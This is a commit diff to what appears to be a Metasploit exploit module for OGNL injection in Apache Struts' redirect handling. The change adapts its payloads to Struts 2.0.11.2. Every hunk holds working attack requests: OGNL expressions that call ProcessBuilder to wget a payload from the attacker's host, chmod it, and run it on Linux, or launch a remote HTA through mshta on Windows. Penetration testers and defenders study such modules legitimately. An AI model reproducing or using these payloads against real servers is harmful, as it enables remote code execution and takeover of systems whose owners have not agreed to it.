Land rapid7#2658 - Make OGNL expressions compatible with struts 2.0.11.2

Author: wchen-r7

modules/exploits/multi/http/struts_default_action_mapper.rb

@@ -27,8 +27,8 @@ def initialize(info = {})
         evaluated as OGNL expression against the value stack, this introduces the
         possibility to inject server side code.
 
-        This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
-        Windows 2003 SP2 and Ubuntu 10.04 operating systems.
+        This module has been tested successfully on Struts 2.3.15 and Struts 2.0.11.2 over
+        Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -156,11 +156,11 @@ def check
     proof = rand_text_alpha(6 + rand(4))
 
     res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}",
       'method' => 'GET'
     })
 
-    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
+    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -181,7 +181,7 @@ def auto_target
     proof = rand_text_alpha(6 + rand(4))
 
     res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
       'method' => 'GET'
     })
 
@@ -215,7 +215,7 @@ def exploit_linux
     fname = "#{fname}/" unless fname =~ %r'/$'
     fname << downfile
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")
 
@@ -239,7 +239,7 @@ def exploit_linux
     # chmod
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Make payload executable...")
 
@@ -256,7 +256,7 @@ def exploit_linux
     # execute
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
+    uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
 
     print_status("#{rhost}:#{rport} - Execute payload...")
 
@@ -285,7 +285,7 @@ def exploit_windows
     # execute hta
     #
     uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
 
     print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")